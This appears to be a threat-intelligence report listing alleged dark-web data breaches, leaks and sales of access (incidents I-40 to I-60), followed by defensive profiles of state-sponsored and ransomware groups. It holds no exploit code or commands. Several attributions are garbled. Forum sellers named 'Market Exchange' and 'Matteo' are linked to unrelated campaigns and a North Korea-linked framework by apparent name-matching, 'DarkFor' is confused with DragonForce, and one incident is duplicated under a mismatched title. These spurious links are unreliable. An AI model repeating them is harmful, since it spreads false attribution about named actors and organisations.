Screenshot: https://d34iuop8pidsy8.cloudfront.net/3921fff2-a8c3-4f43-85e0-d17313084e21.jpg

Incident ID: I-40 – Alleged data breach of Spotify

Incident Description: A threat actor, abc, is claiming to sell data allegedly obtained from Spotify, consisting of a dump of 50,000 email and password combinations. Spotify is a Swedish audio streaming and media service provider founded in 2006, with over 678 million monthly active users.⁴⁶ Specific details about abc are not available in the provided intelligence.
Identified Threat Actor(s): abc
Relevant Links:

Published URL: https://kittyforums.to/thread/217
Screenshot: https://d34iuop8pidsy8.cloudfront.net/5458618f-a28a-401e-b55d-184e2db7083b.png

Incident ID: I-41 – Alleged data breach of Bybit from Malaysia

Incident Description: A threat actor, Market Exchange, claims to be selling a database allegedly obtained from Bybit, which reportedly includes data from a Malaysian digital coin investment platform. The compromised dataset is said to contain sensitive information on approximately 100,000 individuals, including first names, last names, gender, account balances, and other investment-related details. Bybit is a cryptocurrency exchange established in March 2018, specializing in trading derivatives and spot trading.⁴⁸ Market Exchange refers to unidentified threat actors targeting publicly exposed Microsoft Exchange servers to inject malicious JavaScript keylogger code into OWA login pages for credential harvesting.²
Identified Threat Actor(s): Market Exchange
Relevant Links:

Incident ID: I-42 – Alleged Data Leak of MJQ Education Recruitment Portal

Incident Description: The threat actor, sideline_TH, claims to have leaked data from Mengly J. Quach Education, a Cambodian education recruitment platform. Mengly J. Quach Education Plc. (MJQE) is a leading educational provider in Cambodia, founded in 2005, offering programs from Pre-Kindergarten to university research.⁴⁹ Specific details about sideline_TH are not available in the provided intelligence.
Identified Threat Actor(s): sideline_TH
Relevant Links:

Published URL: https://darkforums.st/Thread-LEAK-Cambodia-recruitment-mjqeducation-edu-kh
Screenshot: https://d34iuop8pidsy8.cloudfront.net/a29b33a8-8e15-4e14-9b18-1bdcd870d899.jpg

Incident ID: I-43 – Alleged data leak of customers from Indian fiber optic networks

Incident Description: The threat actor, Market Exchange, claims to be selling data of 160,000 customers from Indian fiber optic networks, reportedly targeting individuals from major cities with upper-tier asset profiles. Market Exchange refers to unidentified threat actors targeting publicly exposed Microsoft Exchange servers to inject malicious JavaScript keylogger code into OWA login pages for credential harvesting.²
Identified Threat Actor(s): Market Exchange
Relevant Links:

Incident ID: I-44 – Alleged data breach of Upstox

Incident Description: The threat actor, chuu, claims to have breached the data of Upstox. The compromised data includes name, address, email, number, etc. Upstox is an online investment brand of RKSV Securities, providing stock trading, commodity trading, currency derivatives trading, mutual funds, and Demat accounts in India.⁵⁰ Specific details about chuu are not available in the provided intelligence.
Identified Threat Actor(s): chuu
Relevant Links:

Published URL: https://darkforums.st/Thread-Document-Database-Of-Upstox-com
Screenshot: https://d34iuop8pidsy8.cloudfront.net/852f5332-8c5a-44d8-a476-e9edad15a855.png

Incident ID: I-45 – Alleged leak of database containing personal information from Indian passport holders

Incident Description: The threat actor, Market Exchange, claims to be selling a database allegedly containing personal information from 70,000 high-net-worth Indian passport holders. Market Exchange refers to unidentified threat actors targeting publicly exposed Microsoft Exchange servers to inject malicious JavaScript keylogger code into OWA login pages for credential harvesting.²
Identified Threat Actor(s): Market Exchange
Relevant Links:

Incident ID: I-46 – Alleged Sale of NTLMv2 Hash Leak via COM + Auto-Execution

Incident Description: The threat actor, xrahitel, claims to be selling a method to leak NTLMv2 hashes by abusing COM objects combined with auto-execution techniques. While effective, this approach requires initial access—such as tricking a user into running a payload—so it is not a zero-click exploit and does not qualify for a CVE. Once executed, the method silently forces authentication to an attacker-controlled server, leaking NTLMv2 hashes without further user interaction. Specific details about xrahitel are not available in the provided intelligence.
Identified Threat Actor(s): xrahitel
Relevant Links:

Published URL: https://ramp4u.io/threads/ntlmv2-hash-leak-via-com-auto-execution.3227/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/8f67664c-37ba-47e7-942f-fb7b71b6403c.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/c4098363-c999-456c-aacd-f09d7198dce9.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/9f99fdc3-6ff4-46f6-963f-b5c760736197.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/7854d035-e54c-426e-bb13-45031d90e763.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/f4ea30cb-4b2b-453a-890c-e644d01693a5.png

Incident ID: I-47 – Alleged data breach of Kleinanzeigen

Incident Description: A threat actor, magically, is claiming to sell a database allegedly linked to Kleinanzeigen, offering access to private logs, session cookies, email data, and user accounts with original email credentials and 2FA bypassed access. Kleinanzeigen is a German online listing platform for buying and selling multi-category secondhand products, founded in 2009.⁵² Specific details about magically are not available in the provided intelligence.
Identified Threat Actor(s): magically
Relevant Links:

Published URL: https://forum.exploit.in/topic/261385/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/c3114ead-01b6-4945-9b9c-12365c872614.png

Incident ID: I-48 – Alleged database sale of telegram chats

Incident Description: The threat actor, Matteo, claims to be selling a large database of over 50,000 Telegram chats. The data is categorized by topics and includes communities related to shadow discussions, drugs, cryptocurrency trading and equipment, car sales, carding, poker, astrology, and more. Several of these databases have participant counts ranging from tens of thousands to over 700,000 users. The database also includes region-specific groups such as those from the CIS and Russia. Matteo is associated with the Tsunami-Framework, a malware framework that relies on the TOR-Network and Pastebin for command and control communications, and is linked to North Korea.⁵
Identified Threat Actor(s): Matteo
Relevant Links:

Published URL: https://xss.is/threads/140537/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/e5ca03b8-5a88-44ed-b67f-962626ea930b.png
Screenshot: https://d34iuop8pidsy8.cloudfront.net/f390a6aa-8901-4fa3-bde2-8d9451ce1d5f.png

Incident ID: I-49 – Alleged data breach of Bank of Baroda

Incident Description: The threat actor, Market Exchange, claims to be selling data belonging to 50,000 customers of Bank of Baroda, India. Market Exchange refers to unidentified threat actors targeting publicly exposed Microsoft Exchange servers to inject malicious JavaScript keylogger code into OWA login pages for credential harvesting.²
Identified Threat Actor(s): Market Exchange
Relevant Links:

Incident ID: I-50 – Alleged data breach of Bybit

Incident Description: The threat actor, MindReader9, claims to have breached 10k data of Bybit. The compromised data consists of dehashed samples. Bybit is a prominent cryptocurrency exchange established in March 2018, specializing in trading derivatives.⁴⁸ Specific details about MindReader9 are not available in the provided intelligence.
Identified Threat Actor(s): MindReader9
Relevant Links:

Published URL: https://darkforums.st/Thread-Bybit-10k-Dehashed-Sample-zip
Screenshot: https://d34iuop8pidsy8.cloudfront.net/cda97eb5-08f5-4214-bbd7-c668d91ca1b6.png

Incident ID: I-51 – Alleged Data Leak of Korean E-Commerce Platform

Incident Description: The threat actor, BezzzDelnick, claims to have leaked data from a Korean e-commerce site, including 648K dehashed records and MD5 hashes. Specific details about BezzzDelnick are not available in the provided intelligence.
Identified Threat Actor(s): BezzzDelnick
Relevant Links:

Published URL: https://xss.is/threads/140536/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/a5c84980-586f-42cb-9f88-c6bcaa96f8a4.jpg

Incident ID: I-52 – Alleged data breach of Fling.com

Incident Description: A threat actor, Matteo, is claiming to be distributing a leaked database from Fling.com, an adult dating platform, allegedly exposing data on approximately 40 million users in a 13.7 GB file. Fling was a social media app founded in 2014, which allowed users to send pictures to random people worldwide, but was later taken offline due to issues with sexually explicit content and funding.⁵³ Matteo is associated with the Tsunami-Framework, a malware framework that relies on the TOR-Network and Pastebin for command and control communications, and is linked to North Korea.⁵
Identified Threat Actor(s): Matteo
Relevant Links:

Published URL: https://xss.is/threads/140531/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/f164808e-b9f2-4e03-afaa-a063ad425dd7.png

Incident ID: I-53 – Alleged data leak of Constitutional Court of Indonesia

Incident Description: The threat actor, Xsvs_Malaikat, claims to have leaked personal data of Indonesian citizens from the Constitutional Court, including names, ID numbers, birthdates, phone numbers, and addresses. The Constitutional Court of the Republic of Indonesia is one of the two national apex courts in Indonesia, established in 2003, with powers including reviewing the constitutionality of Acts and resolving electoral disputes.⁵⁴ Specific details about Xsvs_Malaikat are not available in the provided intelligence.
Identified Threat Actor(s): Xsvs_Malaikat
Relevant Links:

Published URL: https://darkforums.st/Thread-MAHKAMAH-KONSTITUSI-DATABASE
Screenshot: https://d34iuop8pidsy8.cloudfront.net/a4c39612-e083-490c-835d-f6f2c261bdb5.jpg

Incident ID: I-54 – Alleged data breach of Dubsmash

Incident Description: The threat actor, Matteo, claims to be selling a database leak of Dubsmash.com, including over 12 million dehashed passwords. The compromised data includes email addresses, usernames, names, phone numbers, passwords, geographic locations, and spoken languages. The full leak is sized at 144.59 MB. Dubsmash is an application designed for recording and sharing short lip-sync videos, founded in 2014.⁵⁵ Matteo is associated with the Tsunami-Framework, a malware framework that relies on the TOR-Network and Pastebin for command and control communications, and is linked to North Korea.⁵
Identified Threat Actor(s): Matteo
Relevant Links:

Published URL: https://xss.is/threads/140535/
Screenshot: https://d34iuop8pidsy8.cloudfront.net/2dbdc8d8-fd30-442f-accc-a2abdc7bcbcf.png

Incident ID: I-55 – WOLF CYBER ARMY targets the website of IAIN Syekh Nurjati Cirebon

Incident Description: The threat actor, WOLF CYBER ARMY, claims to have defaced the website of IAIN Syekh Nurjati Cirebon. UIN Siber Syekh Nurjati Cirebon aims to be a frontier for the Open Islamic Educational Resources (OIER) movement globally, focusing on digital and networked education.⁵⁶ Specific details about WOLF CYBER ARMY are not available in the provided intelligence.
Identified Threat Actor(s): WOLF CYBER ARMY
Relevant Links:

Published URL: https://t.me/c/2678983526/182
Screenshot: https://d34iuop8pidsy8.cloudfront.net/c63a9d99-48e8-4774-a3df-080c5790994b.jpg

Incident ID: I-56 – Alleged data breach of JAWA TENGAH

Incident Description: A threat actor, Xsvs_Malaikat, claims to have leaked data from Indonesia’s 2015 PBDT survey, exposing national ID numbers, names, addresses, land details, and intervention records. JAWA TENGAH refers to the province of Central Java, Indonesia, which is divided into 29 regencies and six cities.⁵⁹ Specific details about Xsvs_Malaikat are not available in the provided intelligence.
Identified Threat Actor(s): Xsvs_Malaikat
Relevant Links:

Published URL: https://darkforums.st/Thread-JAWA-TENGAH-DATABASE
Screenshot: https://d34iuop8pidsy8.cloudfront.net/c73120cd-5483-4ce7-9288-abbaeb49493c.png

Incident ID: I-57 – Alleged sale of unauthorized access to Kraken

Incident Description: The threat actor, DarkFor, claims to be selling unauthorized access to Kraken. This access allegedly allows lookups by email or phone number and provides detailed information on Kraken users, including full name, country, address, ID verification status, join date, contact details, last login, two-factor authentication method, and current cryptocurrency balances. Kraken is a global cryptocurrency exchange founded in 2011, offering spot and futures trading.⁶⁰ Specific details about DarkFor are not available in the provided intelligence, though DragonForce is a ransomware group that evolved into a “ransomware cartel”.⁷
Identified Threat Actor(s): DarkFor
Relevant Links:

Published URL: https://darkforums.st/Thread-Selling-We-are-selling-an-access-for-the-Kraken-Intranet
Screenshot: https://d34iuop8pidsy8.cloudfront.net/11cc7338-65d8-487c-85a3-c621b79464f7.png

Incident ID: I-58 – WOLF CYBER ARMY targets the website of Explore Redwoods

Incident Description: The threat actor, WOLF CYBER ARMY, claims to have defaced the website of Pengadilan Agama Krui. The title of the incident, however, refers to “Explore Redwoods.” Pengadilan Agama Krui is a religious court in Indonesia.⁶¹ Explore Redwoods (Redwood Software) is a company dedicated to “lights-out automation” for mission-critical business processes, with offices globally.⁶³ Specific details about WOLF CYBER ARMY are not available in the provided intelligence.
Identified Threat Actor(s): WOLF CYBER ARMY
Relevant Links:

Published URL: https://t.me/c/2678983526/186
Screenshot: https://d34iuop8pidsy8.cloudfront.net/1f5399f9-8682-4ffe-b21d-c85590d5546f.jpg

Incident ID: I-59 – WOLF CYBER ARMY targets the website of Explore Redwoods

Incident Description: The threat actor, WOLF CYBER ARMY, claims to have defaced the website of Pengadilan Agama Krui. The title of the incident, however, refers to “Explore Redwoods.” Pengadilan Agama Krui is a religious court in Indonesia.⁶¹ Explore Redwoods (Redwood Software) is a company dedicated to “lights-out automation” for mission-critical business processes, with offices globally.⁶³ Specific details about WOLF CYBER ARMY are not available in the provided intelligence.
Identified Threat Actor(s): WOLF CYBER ARMY
Relevant Links:

Published URL: https://t.me/c/2678983526/186
Screenshot: https://d34iuop8pidsy8.cloudfront.net/1f5399f9-8682-4ffe-b21d-c85590d5546f.jpg

Incident ID: I-60 – Alleged data breach of Kalad

Incident Description: The threat actor, ZeroDayX, claims to have breached Kalad.com.sa, a Saudi Arabian mining and logistics company. The attacker claims to have exploited a zero-day vulnerability to breach and deface the website, exfiltrating the full database. The leaked data reportedly includes client records, internal emails, employee credentials, and contract files. Kalad (KDL Logistics) is a total logistics service provider in Saudi Arabia with over 40 years of experience.⁶⁴ Specific details about ZeroDayX are not available in the provided intelligence.
Identified Threat Actor(s): ZeroDayX
Relevant Links:

IV. Threat Actor Deep Dive

This section provides a detailed analysis of the unique threat actors identified in the reported incidents, drawing upon extensive threat intelligence to provide context on their origins, motivations, and operational methodologies.

A. State-Sponsored Threat Actors

1. Leviathan (China)

Leviathan, also recognized by numerous aliases such as APT40, Kryptonite Panda, TEMP.Periscope, and Gingham Typhoon, is a Chinese-sponsored cyberespionage group that has been actively operating since at least 2009.³ Their primary motivation is cyberespionage, focusing on intelligence gathering that aligns with China’s strategic interests.³

The group’s targeting profile is remarkably broad, encompassing a wide array of nations and critical sectors. Geographically, they have targeted entities in Belgium, Cambodia, Germany, Hong Kong, Indonesia, Laos, Malaysia, Myanmar, New Zealand, Norway, the Philippines, Saudi Arabia, Switzerland, Thailand, the UK, the USA, Vietnam, and the Asia Pacific Economic Cooperation (APEC) region.³ Their sectoral focus includes Aerospace & Defense, Education, Government & Law Enforcement Agencies (LEA), Manufacturing, Technology, and Transportation & Logistics.³ This diverse targeting underscores their role in comprehensive intelligence collection across various strategic domains.

Leviathan’s operational methodologies are characterized by their agility and sophistication. For initial access, they frequently employ spearphishing emails containing malicious attachments, often JavaScript, designed to deploy malware like Cobalt Strike.³ They also utilize links, such as those pointing to Google Drive, to trick targets into downloading and executing harmful content.³ A notable characteristic is their rapid weaponization of newly disclosed vulnerabilities, often exploiting them within days of public disclosure. This includes critical vulnerabilities like CVE-2021-44228 (Log4J), CVE-2021-31207 (Atlassian Confluence), and various Microsoft Exchange CVEs.³ This swift action creates a minimal window for organizations to patch before active exploitation begins, placing immense pressure on vulnerability management programs.

Once a foothold is established, Leviathan employs a diverse array of malware and tools, including both custom-developed backdoors like AIRBREAK and BADFLICK, and publicly available tools such as Cobalt Strike, China Chopper, and Gh0st RAT.³ They often deploy executables with code-signing certificates to evade detection, adding a layer of legitimacy to their malicious activities.³ Persistence is maintained through the extensive use of backdoors and web shells, ensuring continued access to compromised systems.³

For privilege escalation and credential access, Leviathan specifically targets VPN and remote desktop credentials. They leverage custom tools like HOMEFRY, a password dumper and cracker, alongside legitimate tools like Windows Sysinternals ProcDump and Windows Credential Editor (WCE), to escalate privileges and extract password hashes.³ Their defense evasion techniques are highly sophisticated, including steganography to hide data within other files stored on platforms like GitHub, and protocol impersonation, where they use Dropbox API keys to upload stolen data, mimicking legitimate service usage.³ They also employ protocol tunneling, multi-hop proxies like Tor, and domain typosquatting for their C2 infrastructure, all designed to obscure their tracks and blend malicious traffic with legitimate network activity.³ This deliberate blending makes traditional network traffic analysis significantly harder, as C2 can be hidden within normal business communications.

For discovery and lateral movement, Leviathan utilizes Server Message Block (SMB)/Windows Admin Shares and network share directories for reconnaissance and internal movement.³ Cobalt Strike’s ‘Beacon’ agent is a key tool for command execution and lateral movement within compromised networks.³ Data exfiltration involves archiving, encrypting, and staging collected data locally and remotely, often exfiltrating it over the C2 channel. Tools like LUNCHMONEY are specifically used for exfiltration to Dropbox.³ The broad set of tools and techniques, combined with their focus on rapid exploitation and stealthy operations, positions Leviathan as a highly adaptive and persistent threat.

2. Iranian APT Groups (General Overview)

Iranian Advanced Persistent Threat (APT) groups represent a collective of state-sponsored actors, including well-known entities such as APT33 (Elfin, Magnallium), OilRig (APT34, Helix Kitten, Chrysene), Magic Hound (APT35, Charming Kitten), APT42, and MuddyWater (Seedworm, Static Kitten).⁸ These groups are backed by or affiliated with various Iranian intelligence and military organizations, and their operations are closely aligned with Iran’s strategic objectives.¹⁰

Their motivations extend beyond traditional espionage to include long-term intelligence collection, disruption of critical services, and influence operations, often serving as a means of retaliation for perceived threats or sanctions.⁸ A key aspect of their doctrine is to instill fear and signal strength while deliberately operating below the threshold that would warrant a full-scale military response.⁸ This approach contributes to a complex form of hybrid warfare.

The targeting profile of Iranian APTs is diverse and strategically chosen. They have repeatedly targeted U.S. aerospace firms, financial institutions, healthcare systems, government agencies, and critical infrastructure, including water and power utilities.⁸ Beyond Western entities, they also focus on Western think tanks, academic institutions, dissident communities, telecommunications, energy, and media sectors, particularly in the Middle East and South Asia.¹⁰ This broad targeting reflects their comprehensive intelligence and disruptive objectives.

In terms of tactics, techniques, and procedures (TTPs), Iranian APTs heavily rely on spearphishing campaigns for initial access. These campaigns often involve fake login pages, password reset lures, and impersonation tactics designed to trick victims into disclosing credentials.¹⁰ They are also known for exploiting publicly known vulnerabilities, such as CVE-2021-40444, and engaging in supply chain infiltration to gain initial footholds.⁸

For execution and persistence, these groups deploy a mix of custom malware, including DropShot, TurnedUp, PowGoop, and Thanos ransomware variants, alongside commercial remote access tools like Remote Utilities.¹⁰ They frequently leverage legitimate administrative tools such as PowerShell, Remote Desktop Protocol (RDP), and screen capture utilities to maintain access to compromised systems.¹⁰ A significant aspect of their strategy involves infiltrating networks and lying dormant for extended periods, sometimes months or even years, collecting data and mapping systems before initiating their primary objectives.⁸

Defense evasion is a core component of their operations. They utilize polymorphic code, fileless techniques, proxies, disinformation, and false flags to sow confusion and delay attribution.⁸ Their operations often blend traditional espionage with techniques designed to obscure their identity, such as using faux hacktivist personas.¹⁰ This strategic ambiguity in Iranian cyber warfare makes it incredibly challenging for nations to formulate clear deterrence policies and respond proportionately, as direct attribution is difficult and the intent is often to create instability rather than direct destruction. This necessitates robust forensic capabilities and enhanced cross-sector intelligence sharing to overcome attribution ambiguity.

The impact of their operations can range from data theft and espionage to highly destructive wiper attacks, such as those using Apostle and Deadwood malware, and ransomware disguised as hacktivism.¹⁰ They also engage in data leaks and Distributed Denial of Service (DDoS) attacks.¹⁰ The evolution of Iran’s cyber capabilities, particularly after the 2010 Stuxnet attack, demonstrates how a perceived national security threat can spur a nation to significantly enhance its offensive cyber capabilities, leading to an increasingly complex global threat landscape.¹⁰

3. Fancy.Bear (APT28, Russia)

Fancy Bear, also widely known as APT28, Sofacy, Pawn Storm, Sednit, STRONTIUM, Tsar Team, and Threat Group-4127, is a prominent Russian state-sponsored threat actor group.¹¹ Their operations are driven by motivations of state-sponsored espionage, intelligence gathering, and political influence, aligning with Russia’s geopolitical objectives.

The group primarily targets government entities and defense companies across various regions, including Africa, the European Union, and South America.¹¹ This targeting reflects their focus on acquiring sensitive information and influencing political landscapes.

Fancy Bear’s tactics, techniques, and procedures (TTPs) for initial access heavily rely on spearphishing emails. These emails often contain malicious attachments or links to spoofed websites, leveraging social engineering to trick victims into compromise.¹¹ A key method involves exploiting cross-site scripting (XSS) vulnerabilities in webmail interfaces, as demonstrated by their exploitation of CVE-2024-11182 in MDaemon.¹¹ This exploitation allows them to inject malicious JavaScript code directly into the victim’s webmail page. The enduring vulnerability of webmail platforms and the effectiveness of social engineering remain critical points of failure that Fancy Bear consistently exploits. This suggests that despite technical advancements, the human element and common web application weaknesses are still highly effective attack vectors.

Upon successful exploitation, the group delivers SpyPress, a malicious JavaScript payload, specifically designed to exfiltrate sensitive email data from the compromised webmail interface.¹¹ This direct approach to data exfiltration highlights their efficiency in achieving their intelligence objectives once access is gained.

4. puNK-003 (North Korea)

puNK-003 is identified as a North Korean Advanced Persistent Threat (APT) group.¹² While their specific motivations are not explicitly detailed in the available information, the characteristics of North Korean APTs generally suggest state-sponsored espionage or financial gain to support the regime.

The group’s targeting profile is not extensively described, but their reliance on targeted phishing attacks implies a focus on specific, high-value entities or individuals.¹²

A distinctive aspect of puNK-003’s tactics, techniques, and procedures (TTPs) for initial access is their primary method of distributing malware through targeted phishing attacks that utilize malicious LNK files.¹² This approach, similar to how other actors like DarkGate Loader use AutoIt scripts, points to a trend where threat actors leverage less commonly scrutinized file types and scripting languages to bypass traditional security controls. This highlights the resurgence of obscure initial access vectors, as LNK files might evade detection mechanisms that are heavily focused on executable files or macro-enabled documents. Organizations need to enhance their endpoint detection capabilities to analyze file behavior regardless of extension and consider application whitelisting to prevent unauthorized script execution.

Once initial access is achieved, puNK-003 deploys two main types of malware: Lilith RAT, a sophisticated remote access trojan written in C++, and CURKON, an AutoIt variant of Lilith RAT that functions as a downloader.¹² Analysis indicates that puNK-003 shares similarities with the KONNI group, particularly in their use of AutoIt scripts and specific coding functions.¹² Key indicators of an infection include unusual network activity and system slowdowns.¹²

5. CL-STA-0002 (Unattributed, Medium Confidence Nation-State)

CL-STA-0002 is an activity cluster that, while unattributed, is linked with medium confidence to nation-state actors.⁴ The group’s primary motivations appear to be espionage, focused on credential theft and the exfiltration of confidential information.⁴

Their targeting profile is geographically broad, affecting organizations across the U.S., the Middle East, and Africa.⁴ The targeted industries are diverse, including Education, Real estate, Retail, Non-profit organizations, Telecom companies, and Governments.⁴ This wide range of targets suggests a broad intelligence collection mandate.

The tactics, techniques, and procedures (TTPs) employed by CL-STA-0002 demonstrate a high level of sophistication and a focus on stealth and persistence. For execution and persistence, they establish backdoor capabilities using a new malware family named Agent Racoon.⁴ A particularly advanced technique involves the use of a new tool called Ntospy, which is a Network Provider DLL module designed to steal user credentials by hijacking the authentication process.⁴ This allows Ntospy to gain access to user credentials every time a victim attempts to authenticate to the system, representing a deep level of system compromise that can bypass many standard security controls. They also leverage a customized version of Mimikatz, named Mimilite, for credential access.⁴

Defense evasion is a key element of their operations. They use filenames that mimic Microsoft patch patterns and employ .msu extensions to store received credentials in cleartext, effectively blending malicious files with legitimate system files.⁴ The DLL files are often stored in common system paths such as

C:\Windows\System32\ntoskrnl.dll or C:\Windows\Temp\ntoskrnl.dll, further aiding in their concealment.⁴ For command and control (C2), CL-STA-0002 employs a DNS covert channel, encrypting messages with a unique key per sample and utilizing a fallback DNS server.⁴ DNS covert channels are notoriously difficult to detect with traditional network monitoring, as DNS traffic is often allowed and less scrutinized than HTTP/S. This reliance on a DNS covert channel, coupled with deep system compromise for credential theft, indicates a sophisticated adversary focused on long-term, low-profile access. This necessitates advanced endpoint detection and response (EDR) solutions capable of monitoring low-level system calls and behavioral anomalies, as well as specialized DNS monitoring for suspicious traffic patterns that might indicate tunneling.

The overall impact of their operations is the theft of user credentials and the exfiltration of confidential information.⁴ The combination of their advanced techniques and diverse targeting suggests a well-resourced and strategic actor.

B. Financially Motivated Threat Actors

1. Ghost (Cring) Ransomware

Ghost (Cring) Ransomware actors, who are located in China, are primarily motivated by financial gain.¹ They are known by various aliases, including Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.¹ Their ransom demands typically range from tens to hundreds of thousands of dollars, payable in cryptocurrency.¹

The group indiscriminately targets networks with outdated software and firmware versions across more than 70 countries.¹ Their victims span critical infrastructure, schools and universities, healthcare organizations, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.¹ This broad targeting highlights the pervasive risk posed by unpatched systems.

Ghost actors primarily gain initial access by exploiting publicly facing applications with known Common Vulnerabilities and Exposures (CVEs).¹ This “low-hanging fruit” strategy, exploiting readily available weaknesses, is a direct cause of their success. They leverage vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and various Microsoft Exchange vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, commonly referred to as the ProxyShell attack chain).¹ The continuous exploitation of these well-known, unpatched vulnerabilities demonstrates that basic security hygiene failures, particularly in patch management, can lead to devastating and swift impacts.

Once access is gained, Ghost actors upload a web shell to the compromised server. They then use Windows Command Prompt and/or PowerShell to download and execute Cobalt Strike Beacon malware, which is implanted on victim systems.¹ While persistence is not their major focus, often proceeding to ransomware deployment within the same day of initial compromise, they sporadically create new local and domain accounts and change passwords for existing accounts to maintain a foothold.¹ This short dwell time means that traditional incident response playbooks, which might rely on extended detection and analysis periods, are often insufficient.

For privilege escalation, Ghost actors frequently use built-in Cobalt Strike functions to steal process tokens running under the SYSTEM user context to impersonate the SYSTEM user, often for running Beacon with elevated privileges.¹ They also employ open-source tools like “SharpZeroLogon,” “SharpGPPPass,” “BadPotato,” and “GodPotato” to attempt privilege escalation through exploitation.¹ Credential access is achieved by using the Cobalt Strike function “hashdump” or Mimikatz to collect passwords and/or password hashes, aiding in unauthorized logins and lateral movement.¹

Defense evasion tactics include using Cobalt Strike to list running processes to identify and disable antivirus software, particularly Windows Defender.¹ They also use PowerShell to conceal malicious content within legitimate-appearing command windows.¹ For discovery, they utilize built-in Cobalt Strike commands for domain account discovery and open-source tools such as “SharpShares” for network share discovery, and “Ladon 911” and “SharpNBTScan” for remote systems discovery.¹ Lateral movement is achieved by leveraging elevated access and Windows Management Instrumentation Command-Line (WMIC) to run PowerShell commands on additional systems, often to initiate more Cobalt Strike Beacon infections. They encode network traffic using PowerShell commands to reduce detection during lateral movement.¹

While ransom notes often claim data exfiltration, observed data exfiltration by Ghost actors is limited, with some uses of Mega.nz and installed web shells.¹ The primary impact is the encryption of specific directories or entire system storage using ransomware executables like Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.¹ These payloads are designed to hinder recovery by clearing Windows Event Logs, disabling the Volume Shadow Copy Service, and deleting shadow copies.¹ Command and control (C2) heavily relies on Cobalt Strike Beacon malware and Team Servers, communicating over HTTP and HTTPS. Notably, they rarely register domains for their C2 servers, instead directly referencing the C2 server’s IP address in URIs. For email communication with victims, they use legitimate email services with traffic encryption features, such as Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence.¹

2. ToyMaker (Initial Access Broker)

ToyMaker is identified as an Initial Access Broker (IAB), a specialized role within the cybercrime ecosystem.⁶ Their motivation is purely financial, focusing on acquiring and then selling initial access to high-value organizations to secondary threat actors, typically ransomware gangs like CACTUS, for subsequent monetization through double extortion.⁶ This specialization highlights the increasing professionalization of the cybercrime economy, where different actors provide distinct services within a broader attack chain.

ToyMaker’s tactics, techniques, and procedures (TTPs) for initial access involve scanning for vulnerable systems and leveraging a large arsenal of known security flaws in internet-facing applications.⁶ Once a vulnerability is identified, they deploy a custom malware known as LAGTOY (also called HOLERUN).⁶ LAGTOY is a versatile tool capable of creating reverse shells and executing commands on infected endpoints.⁶ It is designed to contact a hard-coded command-and-control (C2) server to retrieve further commands for execution, and it can create processes and run commands under specified users with corresponding privileges.⁶

Following initial access and LAGTOY deployment, ToyMaker typically conducts reconnaissance and credential harvesting, often completing these steps within a week.⁶ For credential access, they establish SSH connections to a remote host to download forensic tools like Magnet RAM Capture, which is used to obtain a memory dump of the machine, likely for gathering victim credentials.⁶ Persistence is also established using tools such as OpenSSH, AnyDesk, and eHorus Agent for long-term access.⁶

A key characteristic of ToyMaker’s operations is their limited ambition; they do not typically conduct data theft themselves.⁶ Their objective is solely to acquire and sell validated access to high-value organizations. This “as-a-service” model significantly lowers the barrier to entry for other criminal groups, allowing less technically proficient ransomware operators to quickly gain access to compromised networks. This implies that defending against ransomware now requires not only defending against the ransomware itself but also disrupting the upstream IAB market by eliminating common initial access vectors like unpatched systems and weak credentials.

3. DragonForce Ransomware

DragonForce is a ransomware group identified in the fall of 2023.⁷ The group is primarily motivated by financial gain and has demonstrated Russian-aligned interests, utilizing Russian-linked infrastructure.⁷ They have been accused by other groups, such as RansomHub members, of associating with the FSB, a Russian intelligence unit.⁷

DragonForce has significantly evolved its operational model, shifting from a Ransomware-as-a-Service (RaaS) model to functioning as a “ransomware cartel”.⁷ This evolution signifies a move towards more organized, resilient, and collaborative criminal enterprises. As a cartel, they offer partners a substantial 80% profit share and provide comprehensive infrastructure, including automation of work processes, a blog, file server, admin and client panels, 24/7 monitoring, petabytes of storage, and Kerb decryption.⁷ This model incentivizes more actors to join and provides them with robust operational support, potentially leading to an increase in the volume and sophistication of attacks.

The group has been highly prolific, claiming over 120 victims in the past year, with a peak of 23 victims in April 2024.⁷ Their targets span various industries, including manufacturing, construction, technology, healthcare, and retail, across countries such as the United States, Italy, and Australia.⁷

DragonForce’s tactics, techniques, and procedures (TTPs) for initial access include exploiting exposed credentials, phishing campaigns, and leveraging known vulnerabilities such as CVE-2024-21412, CVE-2024-21887, and CVE-2024-21893.⁷ For execution, the

dragonforce.exe ransomware can be executed via Windows Command Shell commands, abusing shared modules, or through DLL hijacking.

Works cited

#StopRansomware: Ghost (Cring) Ransomware | CISA, accessed June 25, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
Hackers Target Over 70 Microsoft Exchange Servers to Steal …, accessed June 25, 2025, https://thehackernews.com/2025/06/hackers-target-65-microsoft-exchange.html
Leviathan: Threat Actor Profile – Cyble, accessed June 25, 2025, https://cyble.com/threat-actor-profiles/leviathan/
New Tool Set Found Used Against Organizations in the Middle East …, accessed June 25, 2025, https://unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa/
Autor: Mateo Mrvelj | HiSolutions Research, accessed June 25, 2025, https://research.hisolutions.com/author/mrvelj/
ToyMaker Uses LAGTOY to Sell Access to CACTUS Ransomware …, accessed June 25, 2025, https://thehackernews.com/2025/04/toymaker-uses-lagtoy-to-sell-access-to.html
DragonForce: The Ransomware Cartel Guarding Its Burrow, accessed June 25, 2025, https://www.bitdefender.com/en-us/blog/businessinsights/dragonforce-ransomware-cartel
